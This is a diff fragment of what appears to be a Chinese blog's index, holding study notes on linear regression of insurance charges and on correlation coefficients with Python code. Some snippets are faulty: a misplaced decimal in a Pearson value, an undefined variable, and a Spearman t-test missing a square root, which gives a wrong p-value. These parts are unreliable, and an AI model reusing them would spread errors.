    相关矩阵:                        age       sex       bmi  children    smoker   charges  \age               1.000000 -0.020856  0.109272  0.042469 -0.025019  0.299008   sex              -0.020856  1.000000  0.046371  0.017163  0.076185  0.057292   bmi               0.109272  0.046371  1.000000  0.012759  0.003750  0.198341   children          0.042469  0.017163  0.012759  1.000000  0.007673  0.067998   smoker           -0.025019  0.076185  0.003750  0.007673  1.000000  0.787251   charges           0.299008  0.057292  0.198341  0.067998  0.787251  1.000000   region_northeast  0.002475 -0.002425 -0.138156 -0.022808  0.002811  0.006349   region_northwest -0.000407 -0.011156 -0.135996  0.024806 -0.036945 -0.039905   region_southeast -0.011642  0.017117  0.270025 -0.023066  0.068498  0.073982   region_southwest  0.010016 -0.004184 -0.006205  0.021914 -0.036945 -0.043210                     region_northeast  region_northwest  region_southeast  \age                       0.002475         -0.000407         -0.011642   sex                      -0.002425         -0.011156          0.017117   bmi                      -0.138156         -0.135996          0.270025   children                 -0.022808          0.024806         -0.023066   smoker                    0.002811         -0.036945          0.068498   charges                   0.006349         -0.039905          0.073982   region_northeast          1.000000         -0.320177         -0.345561   region_northwest         -0.320177          1.000000         -0.346265   region_southeast         -0.345561         -0.346265          1.000000   region_southwest         -0.320177         -0.320829         -0.346265                     region_southwest  age                       0.010016  sex                      -0.004184  bmi                      -0.006205  children                  0.021914  smoker                   -0.036945  charges                  -0.043210  region_northeast         -0.320177  region_northwest         -0.320829  region_southeast         -0.346265  region_southwest          1.000000  相关矩阵的上三角表示:                   age       sex       bmi  children    smoker   charges  \age               0.0 -0.020856  0.109272  0.042469 -0.025019  0.299008   sex              -0.0  0.000000  0.046371  0.017163  0.076185  0.057292   bmi               0.0  0.000000  0.000000  0.012759  0.003750  0.198341   children          0.0  0.000000  0.000000  0.000000  0.007673  0.067998   smoker           -0.0  0.000000  0.000000  0.000000  0.000000  0.787251   charges           0.0  0.000000  0.000000  0.000000  0.000000  0.000000   region_northeast  0.0 -0.000000 -0.000000 -0.000000  0.000000  0.000000   region_northwest -0.0 -0.000000 -0.000000  0.000000 -0.000000 -0.000000   region_southeast -0.0  0.000000  0.000000 -0.000000  0.000000  0.000000   region_southwest  0.0 -0.000000 -0.000000  0.000000 -0.000000 -0.000000                     region_northeast  region_northwest  region_southeast  \age                       0.002475         -0.000407         -0.011642   sex                      -0.002425         -0.011156          0.017117   bmi                      -0.138156         -0.135996          0.270025   children                 -0.022808          0.024806         -0.023066   smoker                    0.002811         -0.036945          0.068498   charges                   0.006349         -0.039905          0.073982   region_northeast          0.000000         -0.320177         -0.345561   region_northwest         -0.000000          0.000000         -0.346265   region_southeast         -0.000000         -0.000000          0.000000   region_southwest         -0.000000         -0.000000         -0.000000                     region_southwest  age                       0.010016  sex                      -0.004184  bmi                      -0.006205  children                  0.021914  smoker                   -0.036945  charges                  -0.043210  region_northeast         -0.320177  region_northwest         -0.320829  region_southeast         -0.346265  region_southwest          0.000000  相关矩阵: age               age                 0.000000                  sex                -0.020856                  bmi                 0.109272                  children            0.042469                  smoker             -0.025019                                        ...   region_southwest  charges            -0.000000                  region_northeast   -0.000000                  region_northwest   -0.000000                  region_southeast   -0.000000                  region_southwest    0.000000Length: 100, dtype: float64
    第一个变量 第二个变量 相关性
    0 smoker charges 0.787251
    1 age charges 0.299008
    2 bmi region_southeast 0.270025
    3 bmi charges 0.198341
    4 age bmi 0.109272

    自变量与因变量 charges 的相关性按降序排列:

    1
    2
    3
    # 查看各个特征与 charges 的相关系数
    cormatrix2 = data.corr()
    cormatrix2['charges'].sort_values(ascending =False) # 特征选择
    charges             1.000000smoker              0.787251age                 0.299008bmi                 0.198341region_southeast    0.073982children            0.067998sex                 0.057292region_northeast    0.006349region_northwest   -0.039905region_southwest   -0.043210Name: charges, dtype: float64
    (4) 特征选择

    选取各个特征相关系数最大的前 6 个特征, 重新构建数据集

    1
    2
    3
    data_X = pd.concat([data['smoker'], data['age'], data['bmi'], data['region_southeast'],
    data['children'], data['sex'], data['charges']], axis=1)
    data_X.head()
    smoker age bmi region_southeast children sex charges
    0 1 -1.438764 -0.453320 0 -0.908614 0 16884.92400
    1 0 -1.509965 0.509621 1 -0.078767 1 1725.55230
    2 0 -0.797954 0.383307 1 1.580926 1 4449.46200
    3 0 -0.441948 -1.305531 0 -0.908614 1 21984.47061
    4 0 -0.513149 -0.292556 0 -0.908614 1 3866.85520

    3 建立模型

    (1) 分离自变量和因变量
    1
    2
    3
    4
    # 分离因变量
    target = data_X.charges
    # 分离自变量
    features = data_X.drop(columns=['charges'])
    (2) 检查因变量数据是否满足正态分布
    1
    2
    3
    4
    # 分析医疗费用的分布是否符合正态
    x = target
    sns.distplot(x, hist=True, kde=True, kde_kws={"color": "k", "lw": 3, "label": "KDE"},
    hist_kws={"histtype": "stepfilled", "linewidth": 3, "alpha": 1, "color": "g"})
    ###有警告信息###<AxesSubplot:xlabel='charges', ylabel='Density'>

    png

    保险分布的数据右偏(平均数大于中位数)

    可以采用取对数, 去平方根的方法将大的数据向左移

    1
    2
    3
    4
    5
    6
    # log(1 + x)
    target = np.log1p(target)
    # 分析医疗费用的分布是否符合正态
    x = target
    sns.distplot(x, hist=True, kde=True, kde_kws={"color": "k", "lw": 3, "label": "KDE"},
    hist_kws={"histtype": "stepfilled", "linewidth": 3, "alpha": 1, "color": "g"})
    ###有警告信息###<AxesSubplot:xlabel='charges', ylabel='Density'>

    png

    (3) 划分数据集, 建立训练数据集和测试数据集
    1
    2
    3
    4
    5
    # 划分数据集,sklearn.model_selection.train_test_split 随机划分训练集和测试集
    seed = 123 # 随机种子数
    X_train, X_test, y_train, y_test = train_test_split(features, target, test_size = 0.3,
    random_state = seed) # 设置 70%为训练数据
    print("训练集", X_train.shape, ",测试集", X_test.shape)
    训练集 (936, 6),测试集 (402, 6)
    (4) 使用线性回归创建模型
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    # 第 1 步:导入线性回归
    from sklearn.linear_model import LinearRegression
    # 第 2 步:创建模型:线性回归
    model = LinearRegression()
    # 第 3 步:训练模型
    model.fit(X_train,y_train)
    # 获得线性回归模型的参数
    a = model.intercept_#截距
    b = model.coef_#回归系数
    print("最佳拟合线:截距",a,"\n 回归系数:",b)
    最佳拟合线:截距 8.851551231348216 回归系数:[ 1.53318059  0.48875255  0.08953472 -0.07628352  0.1276445  -0.08411224]

    4 评估模型

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    # 对线性回归进行预测
    y_pred = model.predict(X_test)
    # 评价回归模型
    score=model.score(X_test, y_test) # 查看判定系数的方法一
    print("个人医保数据线性回归模型的决定系数即 R 平方为:",score)
    from sklearn.metrics import explained_variance_score,mean_absolute_error,\
    mean_squared_error,median_absolute_error,r2_score

    print("个人医保数据线性回归模型的平均绝对误差为:",mean_absolute_error(y_test,y_pred))
    print("个人医保数据线性回归模型的均方误差 MSE 为:", mean_squared_error(y_test,y_pred))
    print("个人医保数据线性回归模型的中值绝对误差为:",median_absolute_error(y_test,y_pred))
    print("个人医保数据线性回归模型的可解释方差值为:", explained_variance_score(y_test,y_pred))
    # 查看判定系数的方法二
    print("个人医保数据线性回归模型的判定系数即 R 平方为:",r2_score(y_test,y_pred))
    个人医保数据线性回归模型的决定系数即 R 平方为:0.7830070691295015个人医保数据线性回归模型的平均绝对误差为:0.2707571270860692个人医保数据线性回归模型的均方误差 MSE 为:0.17131210181347262个人医保数据线性回归模型的中值绝对误差为:0.14746506518623992个人医保数据线性回归模型的可解释方差值为:0.7831735070420169个人医保数据线性回归模型的判定系数即 R 平方为:0.7830070691295015

    通过交叉验证来持续优化模型(十折交叉验证)

    十折交叉验证,英文名叫做 10-fold cross-validation,用来测试算法准确性。是常用的测试方法。将数据集分成十份,轮流将其中 9 份作为训练数据,1 份作为测试数据,进行试验。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    # 交叉验证
    from sklearn.model_selection import cross_val_predict
    predicted = cross_val_predict(model,features, target,cv=10)
    # 获得线性回归模型的参数
    a=model.intercept_ # 截距
    b=model.coef_ # 回归系数
    print("最佳拟合线:截距",a,"\n 回归系数:",b)
    print("个人医保数据线性回归模型的平均绝对误差为:",mean_absolute_error(target,predicted))
    print("个人医保数据线性回归模型的均方误差 MSE 为:", mean_squared_error(target,predicted))
    print("个人医保数据线性回归模型的中值绝对误差为:",median_absolute_error(target,predicted))
    print("个人医保数据线性回归模型的可解释方差值为:",
    explained_variance_score(target,predicted))
    print("个人医保数据线性回归模型的判定系数即 R 平方为:",r2_score(target,predicted))
    最佳拟合线:截距 8.851551231348216 回归系数:[ 1.53318059  0.48875255  0.08953472 -0.07628352  0.1276445  -0.08411224]个人医保数据线性回归模型的平均绝对误差为:0.28154076344034734个人医保数据线性回归模型的均方误差 MSE 为:0.20010936615767003个人医保数据线性回归模型的中值绝对误差为:0.13490158250103956个人医保数据线性回归模型的可解释方差值为:0.7630797649634316个人医保数据线性回归模型的判定系数即 R 平方为:0.7630793987615034

    14.9 高手点拨

    解析法梯度下降法
    要求$(\mathbf X^T\mathbf X)$必须可逆不要求$(\mathbf X^T\mathbf X)$可逆
    求$(\mathbf X^T\mathbf X)$的逆费时较多, 当特征较多时运算很慢特征较多时运算不会特别慢
    不需要特征缩放需要特征缩放
    只需计算一次就能求解需要多次迭代
    不需要选择学习步长需要选择学习步长
    对于更复杂的问题可能求不出解可用于更复杂的问题, 可移植性强

    具体地说, 只要特征变量的数量小于 10000, 通常会使用解析法, 而不是梯度下降法

    ]]>
    @@ -9996,7 +9996,7 @@ /posts/Python-%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD%E6%95%B0%E5%AD%A6%E5%9F%BA%E7%A1%8013/ - 正文

    13 相关分析

    皮尔逊、斯皮尔曼、肯德尔相关系数介绍及其在特征选择中的应用

    协方差

    $$\mathrm{cov} (X,Y)=E{\left[ X-E(X)\right]\left[Y-E(Y)\right]}=E(XY)-E(X)E(Y)=\sigma(X,Y)$$

    $$\mathrm{cov} (X,Y)=\rho_{XY}\sqrt{D(X)}\sqrt{D(Y)}$$

    两个随机变量之间关系正相关不相关(相互独立)负相关
    协方差>0=0<0

    $$D(X+Y)=D(X)+D(Y)+2\mathrm{Cov}(X,Y)$$

    X 与与自己的协方差就是 X 的方差

    对于样本数据:

    $$\mathrm{cov}(X,Y)=\frac{\Sigma^n_{i=1}(X_i-\bar X)(Y_i-\bar Y)}{n-1}$$

    协方差可以反映两个变量的关联程度, 但是不好度量

    13.2 皮尔森相关系数

    皮尔森相关系数是用来度量两个连续型的随机正态变量之间的线性关系的一种随机变量特征量

    协方差÷标准差

    $$\rho_{XY}=\frac{\mathrm{cov}(X,Y)}{\sigma_X\sigma_Y}=\frac{\mathrm{cov}(X,Y)}{\sqrt{D(X)}\sqrt{D(Y)}}=\frac{\sigma(X,Y)}{\sigma(X)\sigma(Y)}$$

    $$-1\le \rho_{XY} \le 1$$

    13.3 相关系数的计算与假设检验

    13.3.1 相关系数的计算

    1 矩阵中行数据之间的相关系数的计算和列数据之间的相关系数的计算
    import numpy as np

    tang = np.array([[10, 10, 8, 9, 7],
    [4, 5, 4, 3, 3],
    [3, 2, 1, 1, 1]])

    print("data source")
    print(tang)

    print("corrcoef between rowdata") # 行数据相关关系矩阵
    print(np.corrcoef(tang))

    print("corrcoef between columndata") # 列数据相关关系矩阵
    print(np.corrcoef(tang, rowvar=0))
    data source[[10 10  8  9  7] [ 4  5  4  3  3] [ 3  2  1  1  1]]corrcoef between rowdata[[1.         0.64168895 0.77174363] [0.64168895 1.         0.53452248] [0.77174363 0.53452248 1.        ]]corrcoef between columndata[[1.         0.9694552  0.9526832  0.9939441  0.97986371] [0.9694552  1.         0.99813671 0.99053606 0.99890611] [0.9526832  0.99813671 1.         0.98031562 0.99419163] [0.9939441  0.99053606 0.98031562 1.         0.99587059] [0.97986371 0.99890611 0.99419163 0.99587059 1.        ]]

    如 corrcoef between rowdata[0][1]或 corrcoef between rowdata[1][0]所表示的是数组第 0 行数据[10, 10, 8, 9, 7]和第一行数据[4, 5, 4, 3, 3]的相关系数 0.64168895

    一组数据和自身的相关系数为 1

    2 理论计算与函数计算之间的比较
    import pandas as pd
    import numpy as np

    df = pd.DataFrame([[3.8, 4, 5.8, 8, 11.3, 14.4,16.5,16.2,13.8,10.8,6.7,4.7],
    [77.7, 51.2, 60.1, 54.1, 55.4, 56.8, 45, 55.3, 67.5, 73.3, 76.6, 79.6]],
    columns=range(1, 13),
    index=["月平均气温 t/°C", "降雨量 p/mm"])
    df.columns.name = "月份"
    df
    月份 1 2 3 4 5 6 7 8 9 10 11 12
    月平均气温 t/°C 3.8 4.0 5.8 8.0 11.3 14.4 16.5 16.2 13.8 10.8 6.7 4.7
    降雨量 p/mm 77.7 51.2 60.1 54.1 55.4 56.8 45.0 55.3 67.5 73.3 76.6 79.6

    伦敦市平均气温 t 与降水量 p 之间的相关系数:
    $$r_{tp}=\frac{\sigma(t,p)}{\sigma(t)\sigma(p)}=-4.895$$

    np.corrcoef(df)
    array([[ 1.        , -0.48949468],       [-0.48949468,  1.        ]])

    13.3.2 相关系数的显著性检验

    10 个学生初一数学分数 X 与初二数学分数 Y 如下表所示, 求它们之间的相关系数, 并从总体角度判断初一和初二数学分数是否存在关联?

    1 计算成绩间的相关系数
    import pandas as pd
    import numpy as np

    tang = np.array([[74, 71, 72, 68, 76,73,67,70,65,74],
    [76, 75, 71, 70, 76, 79, 65, 77, 62, 72]])
    data = np.array([np.append(data[0], data[0].sum()), np.append(data[1], data[1].sum())])
    c = list(range(1, 11))
    c.append("总和")
    df = pd.DataFrame(data, columns=c, index=["X", "Y"])
    df.columns.name = "序号"
    df
    序号 1 2 3 4 5 6 7 8 9 10 总和
    X 74 71 72 68 76 73 67 70 65 74 710
    Y 76 75 71 70 76 79 65 77 62 72 723
    np.corrcoef(tang)
    array([[1.       , 0.7802972],       [0.7802972, 1.       ]])

    得到相关系数: $r = 0.7802972$

    2 构建假设检验确定总体数据间是否存在关联

    根据样本数据提出总体的一个假设

    假设$H_0:\rho=0,H_1:\rho\ne0$

    对于成对数据的检验, 一般用 t 检验, 构建检验统计量

    相关系数的检验

    escorc

    The Pearson linear correlation coefficient ® for n pairs of independent observations can be tested against the null hypothesis (ie.: >no correlation) using the statistic

    t = r*sqrt[ (n-2)/(1-r^2) ]

    This statistic has a Student-t distribution with n-2 degrees of freedom.(此统计量具有具有 n-2 个自由度的学生 t 分布)

    $$t=\frac{r\sqrt{n-2}}{\sqrt{1-r2}}=\frac{0.7803\sqrt{10-2}}{\sqrt{1-0.78032}}=3.5289$$

    $$t=3.5289>3.3554=t_{\alpha/2}(n)=t_{0.005}(8)$$

    在显著水平$\alpha=0.01$的情况下, 采用$t$双边检验, 可以得到相关系数$\rho\ne0$, 即在显著水平 0.01 下, 初一数学成绩和初二成绩之间存在显著的相关关系

    from scipy.stats import t

    r = np.corrcoef(tang)[0][1]
    t_value = r * np.sqrt(10 - 2) / np.sqrt(1 - r ** 2)
    print("相关系数: ", t_value, '>', t.ppf(1 - 0.005, 8))
    print("显著性水平: ", 2 * (1 - t.cdf(t_value, 8)), '<', "0.01")
    相关系数:  3.52891333162547 > 3.3553873313333957显著性水平:  0.007744294734007395 < 0.01
    import scipy.stats as stats

    cor, pv = stats.pearsonr(tang[0], tang[1])
    print("cor =", cor)
    print("pv =", pv)
    cor = 0.7802972005173809pv = 0.007744294734007256

    cor 即为两组数据之间的相关系数
    pv 为显著性水平

    例 13.4

    import numpy as np
    import scipy.stats as stats
    import matplotlib.pyplot as plt
    # https://docs.scipy.org/doc/scipy-0.19.1/reference/stats.html#module-scipy.stats

    # data source
    x = [10.35, 6.24, 3.18, 8.46, 3.21, 7.65, 4.32, 8.66, 9.12, 10.31]
    y = [5.1, 3.15, 1.67, 4.33, 1.76, 4.11, 2.11, 4.88, 4.99, 5.12]

    # compute correlation and pvalue
    correlation,pvalue = stats.pearsonr(x,y)
    print ('correlation',correlation)
    print ('pvalue',pvalue)

    # create figure and configuring
    plt.figure(figsize=(8,5), dpi=80)
    plt.subplot(111)

    # plotting the scatter figure
    plt.scatter(x,y,color='red')

    # 绘制回归直线
    x = np.linspace(2, 11, 2)
    y = 0.5115 * x + 0.0649 # 这个值是计算器算的..
    plt.plot(x, y, color="blue", alpha=0.2)

    plt.show();
    correlation 0.9891763198690562pvalue 5.926875946481136e-08

    png

    13.4 斯皮尔曼等级相关

    13.4.1 皮尔森相关系数的局限性

    对于非线性关系, 相关性的检测功效会下降

    13.4.2 斯皮尔曼等级相关系数

    【数据科学】斯皮尔曼的等级相关系数(Spearman’s coefficient)

    1 斯皮尔曼等级相关系数的表示

    斯皮尔曼等级相关主要用于解决名称数据和顺序数据相关的问题.当两个变量值以等级次序排列或以等级次序表示时, 两个相应的总体并不一定呈正态分布, 样本容量也不一定大于 30, 这种情况下可以用斯皮尔曼等级相关来描述两个变量之间的相关关系.

    $$r_s=1-\frac{6\Sigma d2_i}{n3-n}$$

    $n$为等级个数, $d$为二列成对变量的等级差数

    • 无论两个变量的数据如何变化, 符合什么样的分布, 我们只关心每个数值在变量内的排列顺序(秩)

    • 当每个变量是另一个的完美单调函数时,发生+1 或-1 的完美斯皮尔曼相关

    • 数据中出现了有相同等级的数据,一般对于有相同等级的数据的个体用所占有的平均等级作为它们的共同等级,比如有两个数据大小相同,分别占据 5,6 等级,则将 5.5 作为它们的共同等级

    3 斯皮尔曼等级相关系数显著性检验

    $$t=\frac{r_s\sqrt{n-2}}{\sqrt{1-r^2_s}}$$

    4 应用 Python 函数库计算斯皮尔曼等级相关系数
    1 直接计算斯皮尔曼等级相关系数
    import numpy as np
    import scipy.stats as stats

    x = [10.35, 6.24, 3.18, 8.46, 3.21, 7.65, 4.32, 8.66, 9.12, 10.31]
    y = [5.1, 3.15, 1.67, 4.33, 1.76, 4.11, 2.11, 4.88, 4.99, 5.12]
    correlation, pvalue = stats.spearmanr(x, y)
    print('correlation:', correlation)
    print('pvalue:', pvalue)
    correlation: 0.9878787878787878pvalue: 9.307459988955517e-08
    2 先将原始数据转换成等级数据, 再计算斯皮尔曼等级相关系数
    import numpy as np
    import scipy.stats as stats

    x = [10.35, 6.24, 3.18, 8.46, 3.21, 7.65, 4.32, 8.66, 9.12, 10.31]
    y = [5.1, 3.15, 1.67, 4.33, 1.76, 4.11, 2.11, 4.88, 4.99, 5.12]
    # rankdata () 函数将数组作为输入参数,对数组内的每个元素进行排序,并以另一个相同长度的数组的形式返回结果。
    x = stats.rankdata(x)
    y = stats.rankdata(y)
    print(x)
    print(y)
    correlation, pvalue = stats.spearmanr(x, y)
    print('correlation:', correlation)
    print('pvalue:', pvalue)
    [10.  4.  1.  6.  2.  5.  3.  7.  8.  9.][ 9.  4.  1.  6.  2.  5.  3.  7.  8. 10.]correlation: 0.9878787878787878pvalue: 9.307459988955517e-08

    用等级数据计算得到的斯皮尔曼相关系数和显著性水平与原始数据计算得到的数据相同

    from scipy.stats import t
    import numpy as np
    import scipy.stats as stats

    x = [10.35, 6.24, 3.18, 8.46, 3.21, 7.65, 4.32, 8.66, 9.12, 10.31]
    y = [5.1, 3.15, 1.67, 4.33, 1.76, 4.11, 2.11, 4.88, 4.99, 5.12]
    x = stats.rankdata(x)
    y = stats.rankdata(y)

    correlation = 1 - (6 * ((x - y) ** 2).sum()) / (n ** 3 - n)

    n = len(x)
    r_s = 1 - (6 * ((x - y) ** 2).sum()) / (n ** 3 - n)
    t_value = r_s * np.sqrt(n - 2) / (1 - r_s ** 2)
    pvalue = 2 * (1 - t.cdf(t_value, n - 2))

    print('correlation:', correlation)
    print('pvalue:', pvalue)
    correlation: 0.9878787878787879pvalue: 3.419486915845482e-14

    13.5 肯德尔系数

    描述 K 个评分这对 N 个对象评价的一致性

    13.5.3 肯德尔相关系数的显著性检验

    import scipy.stats as stats

    x1 = [10, 9, 8, 7, 6]
    x2 = [10, 8, 9, 6, 7]

    tau, p_value = stats.kendalltau(x1, x2)
    print("tau", tau)
    print("p_value", p_value)
    tau 0.6p_value 0.23333333333333334

    说明等级数据 x1 和 x2 的肯德尔相关系数为 0.6, 其显著性水平约为 0.233, 二者呈现出较弱的一致性

    13.6 相关分析

    相关分析也是研究两个变量之间的相关关系的分析方法, 其中

    一个变量描述事物总体的性或特点, 如男与女, 优与劣, 及格与不及格等(一般是离散的形式)

    另一个变量以数形式描述事物的具体性质, 如智商, 学科分数, 身高, 体重等

    这两个变量之间的相关关系就是质量相关

    13.6.1 二列相关

    1 二列相关的数学定义

    当两个变量都是正态连续变量, 其中一个变量被人为地划分成二分变量

    $$R=\frac{\bar{X_p}-\bar{X_q}}{\sigma}*\frac{pq}{Y}$$

    变量含义
    $p$二分变量中某一类别频率的比率
    $q$二分变量中另一类别频率的比率
    $\bar{X_p}$二分变量中$p$类别相对应的连续变量的平均值
    $\bar{X_q}$二分变量中$q$类别相对应的连续变量的平均值
    $\sigma$连续变量的标准差
    $Y$正态曲线中累积概率$p$相对应的概率密度函数值

    $$Y = \frac{1}{\sqrt{2\pi}}e{-\frac{x2}{2}}$$

    2 二列相关实例

    例 13.10

    某次考试中, 有 10 名考生的成绩如下表所示, 包含总分和一道问答题, 试求该道问答题的区分度(该问答题得分与卷面总分的相关度)(人为规定问答题$\ge$6 为通过, 否则为未通过)

    import pandas as pd
    import numpy as np
    from scipy.stats import norm

    data = np.array([[75, 57, 73, 65, 67, 56, 63, 61, 65, 67],
    [7, 6, 7, 4, 7, 4, 4, 4, 7, 6]])
    df = pd.DataFrame(data, columns=range(1, 11), index=["卷面总分", "问答题总分"])
    df.columns.name = "考生"
    df
    考生 1 2 3 4 5 6 7 8 9 10
    卷面总分 75 57 73 65 67 56 63 61 65 67
    问答题总分 7 6 7 4 7 4 4 4 7 6

    由于问答题以 6 分为界进行区分, 由样本数据确定$p=0.60, q=0.40$

    p = np.array(np.where(data[1] >= 6)).size / len(data[1])
    q = np.array(np.where(data[1] < 6)).size / len(data[1])
    print("p:", p)
    print("q:", q)
    p: 0.6q: 0.4

    当$p=0.6$时, 查正态分布表得到连续随机变量$x=0.25$

    x = norm.ppf(p)
    print("x:", x)
    x: 0.2533471031357997

    当$x=0.25$时, 代入标准正态分布函数$Y = \frac{1}{\sqrt{2\pi}}e{-\frac{x2}{2}}$

    得到$Y=0.3866$

    Y = norm.pdf(x)
    print("Y:", Y)
    Y: 0.38634253349686054

    根据问答题得分分类, 计算卷面总分相应类比的平均数及样本均方差

    $\bar{X_p}=67.33, \bar{X_q}=61.25, \sigma=6.12$

    X_p_bar = data[0][np.where(data[1] >= 6)].mean()
    X_q_bar = data[0][np.where(data[1] < 6)].mean()
    sigma = data[0].std(ddof=1)
    print("X_p_bar:", X_p_bar)
    print("X_q_bar:", X_q_bar)
    print("std:", sigma)
    X_p_bar: 67.33333333333333X_q_bar: 61.25std: 6.118278625016463

    通过公式计算得到二列相关系数

    $$R=\frac{\bar{X_p}-\bar{X_q}}{\sigma}\frac{pq}{Y}=\frac{67.33-61.25}{6.12}\frac{0.6*0.4}{0.3866}\approx0.62$$

    R = (X_p_bar - X_q_bar) / sigma * p * q / Y
    R
    0.617662281919257

    从二列相关系数的值, 可以看到问答题得分对总分的区分度略高

    13.6.2 点二列相关

    质量分析中用来描述事物总体性质的离散变量, 如果其性质本身就具有离散性质, 而不是人为地将连续变量划分成为连续变量, 这时候的相关关系称为点二列相关.

    $$R=\frac{\bar{X_p}-\bar{X_q}}{\sigma}*\sqrt{pq}$$

    13.6.3 Python 对点二列相关的支持

    import scipy.stats as stats

    x = [1,0,0,0,0,0,0,1,1,1,1,0,1,1,1,1,1,0,0,0]
    y = [84,82,76,60,72,74,76,84,88,90,78,80,92,94,96,88,90,78,76,74]
    coef,pvalue=stats.pointbiserialr(x, y)
    print('pointbiserialcorrcoef',coef)
    print('pvalue',pvalue)
    pointbiserialcorrcoef 0.7849870641173373pvalue 4.145927973490357e-05
    • 点二列相关系数约为 0.785, 说明两组数据具有较好的一致性

    • 输出的显著性水平的值很小, 表示相关系数具有统计学意义

    13.7 品质相关分析

    如果两个变量都是用来描述事物的综合性质且都是划分成几种类别来表示, 则称这两个变量之间的相关关系为品质相关

    有两种不同的品质相关: 列连相关和$\varphi$相关

    13.7.1 列连相关系数

    1 列连相关系数的数学表示
    • 当至少一个变量被分成两个以上类别, 则这两个变量之间的相关程度可用列连相关系数来测度.

    • 假设变量$x$被分成$a$个类别, $y$被分成$b$个类别, 而且$a$和$b$至少有一个大于 2, 此时变量$x$与变量$y$的列连相关系数记为 C

    • 记$m_{ij}$为观察数据属于变量$x$的第$i$个类别$(i=1,2,…,a)$, 变量$y$的第$j$类别$(j=1, 2, …, b)$的频数

    $$a_i=\Sigma^b_{j=1}m_{ij},i=1, 2, …, a$$

    $$b_j=\Sigma^a_{j=1}m_{ij},i=1, 2, …, b$$

    构造统计量:

    $$\chi2=N(\Sigma\Sigma\frac{m2_{ij}}{a_ib_j}-1)$$

    其中$N=\Sigma\Sigma m_{ij}$, 这样可以得到列连相关系数$C$的计算公式

    $$C=\sqrt{\frac{\chi2}{N+\chi2}}$$

    对于列连相关, 可以用卡方检验进行总体性质推断, 若卡方检验显著, 则列连相关系数也显著

    2 列连相关系数的计算实例

    计算调查对象和态度之间的列连相关系数, 并进行显著性检验

    调查对象/态度赞成不置可否反对总计
    低年级学生446212319977
    高年级学生273193324790
    教师262325177764
    总计9817308202531

    $\chi2=N(\Sigma\Sigma\frac{m2 _ {ij}}{a _ ib _ j}-1) \approx130.02$

    $C=\sqrt{\frac{\chi2}{N+\chi2}}=\sqrt{\frac{130.2}{2531+130.2}}=0.221$

    import numpy as np

    data = np.array([[446, 212, 319],
    [273, 193, 324],
    [262, 325, 177]])
    N = data.sum()
    Sum = 0
    for a in range(data.shape[0]):
    for b in range(data.shape[1]):
    Sum += (data[a][b] ** 2) / (data[a].sum() * data.T[b].sum())
    chi_square = N * (Sum - 1)
    C = np.sqrt(chi_square / (N + chi_square))
    print("chi_square:", chi_square)
    print("C:", C)
    chi_square: 130.0172447754466C: 0.22104293310887424
    from scipy.stats import chi2

    chi2.isf(0.01, 4)
    13.276704135987625

    因为$\chi^2=130.02>13.277$, 所以求得系数$C=0.221$具有显著意义

    13.7.2 $\varphi$相关

    1 $\varphi$相关系数的数学定义

    当两个变量都是二分变量, 则这两个变量之间的相关系数称为$\varphi$相关系数

    A 和 B 的 2x2 列连$B_1$$B_2$合计
    A_1aba+b
    A_2cdc+d
    合计a+cb+dN=a+b+c+d

    则 A 和 B 的$\varphi$系数的计算公式可以表示为:

    $$r_\varphi=\frac{ad-bc}{\sqrt{(a+b)(a+c)(b+d)(c+d)}}$$

    $$\chi2=\frac{N(ad-bc)2)}{(a+b)(a+c)(b+d)(c+d)}$$

    易证:

    $$r_\varphi=\pm\sqrt{\frac{\chi^2}{N}}$$

    (正负号由$ad-bc$的值决定)

    2 $\varphi$相关系数的应用
    R/C肯定否定合计
    男生2288110
    女生184260
    合计40130170

    $$\chi2=\frac{N(ad-bc)2)}{(a+b)(a+c)(b+d)(c+d)}=2.1577$$

    $$\because ad-bc>0$$

    $$\therefore r_\varphi>0$$

    $$r_\varphi=\sqrt{\frac{\chi^2}{N}}=0.1127$$

    $$\chi2<\chi2_{0.05}(1)=3.84$$

    所以求得的$\varphi$相关系数不具有统计显著意义

    13.8 偏相关与复相关

    13.8.1 偏相关

    多要素所构成的系统中, 先不考虑其他要素的影响, 单独研究两个要素之间的相互关系的密切程度

    1 一阶偏相关系数

    控制 3, 计算 1 和 2 的净影响

    $$r_{12,3}=\frac{r_{12}-r_{13}r_{23}}{\sqrt{(1-r2_{13})(1-r2_{23})}}$$

    3 组变量共有$C^2_3=3$个一阶偏相关系数

    2 二阶偏相关系数

    $$r_{12,34}=\frac{r_{12,3}-r_{14,3}r_{24,3}}{\sqrt{(1-r2_{14,3})(1-r2_{24,3})}}$$

    4 组变量共有$C^2_4=6$个二阶偏相关系数

    13.8.2 复相关

    $$R_{y,12}=\sqrt{1-(1-r2_{y1})(1-r2_{y2,1})}$$

    $$R_{y,123}=\sqrt{1-(1-r2_{y1})(1-r2_{y2,1})(1-r^2_{y3,12})}$$

    • 反映几个要素与某一个要素之间的复相关程度, 复相关系数介于 0~1

    • 复相关系数越大, 表明变量之间的相关程度越密切, 复相关系数为 1, 表示完全相关, 为 0, 表示不相关

    • 复相关系数必≥单相关系数的绝对值

    • 复相关系数必≥同一系列数据所求得的偏相关系数的绝对值, 即$R_{1,23}\ge|r_{12,3}|$

    ]]>
    + 正文

    13 相关分析

    皮尔逊、斯皮尔曼、肯德尔相关系数介绍及其在特征选择中的应用

    协方差

    $$\mathrm{cov} (X,Y)=E{\left[ X-E(X)\right]\left[Y-E(Y)\right]}=E(XY)-E(X)E(Y)=\sigma(X,Y)$$

    $$\mathrm{cov} (X,Y)=\rho_{XY}\sqrt{D(X)}\sqrt{D(Y)}$$

    两个随机变量之间关系正相关不相关(相互独立)负相关
    协方差>0=0<0

    $$D(X+Y)=D(X)+D(Y)+2\mathrm{Cov}(X,Y)$$

    X 与与自己的协方差就是 X 的方差

    对于样本数据:

    $$\mathrm{cov}(X,Y)=\frac{\Sigma^n_{i=1}(X_i-\bar X)(Y_i-\bar Y)}{n-1}$$

    协方差可以反映两个变量的关联程度, 但是不好度量

    13.2 皮尔森相关系数

    皮尔森相关系数是用来度量两个连续型的随机正态变量之间的线性关系的一种随机变量特征量

    协方差÷标准差

    $$\rho_{XY}=\frac{\mathrm{cov}(X,Y)}{\sigma_X\sigma_Y}=\frac{\mathrm{cov}(X,Y)}{\sqrt{D(X)}\sqrt{D(Y)}}=\frac{\sigma(X,Y)}{\sigma(X)\sigma(Y)}$$

